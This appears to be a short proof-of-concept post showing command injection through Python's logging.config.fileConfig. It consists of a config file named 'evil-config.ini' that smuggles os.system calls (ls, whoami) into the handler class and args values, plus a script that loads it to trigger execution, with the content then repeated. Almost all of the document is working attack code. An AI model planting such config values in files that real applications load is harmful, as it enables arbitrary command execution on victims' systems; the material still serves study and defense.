dhondta · January 11, 2023 13:02
diff --git a/evil-config.ini b/evil-config.ini
 [loggers]
 keys=root

 [handlers]
 keys=stream_handler

 [formatters]
 keys=formatter

 [logger_root]
 level=DEBUG
 handlers=stream_handler

 [handler_stream_handler]
 class=__import__('os').system('ls') or StreamHandler
 level=DEBUG
 formatter=formatter
 args=(__import__('os').system('whoami') or sys.stderr, )

 [formatter_formatter]
 format=%(name)-12s %(levelname)-8s %(message)s
diff --git a/poc-python-logging.py b/poc-python-logging.py
 from logging.config import fileConfig

 # trigger the vulnerability
 fileConfig("evil-config.ini")
	[loggers]
	keys=root

	[handlers]
	keys=stream_handler

	[formatters]
	keys=formatter

	[logger_root]
	level=DEBUG
	handlers=stream_handler

	[handler_stream_handler]
	class=__import__('os').system('ls') or StreamHandler
	level=DEBUG
	formatter=formatter
	args=(__import__('os').system('whoami') or sys.stderr, )

	[formatter_formatter]
	format=%(name)-12s %(levelname)-8s %(message)s
	from logging.config import fileConfig

	# trigger the vulnerability
	fileConfig("evil-config.ini")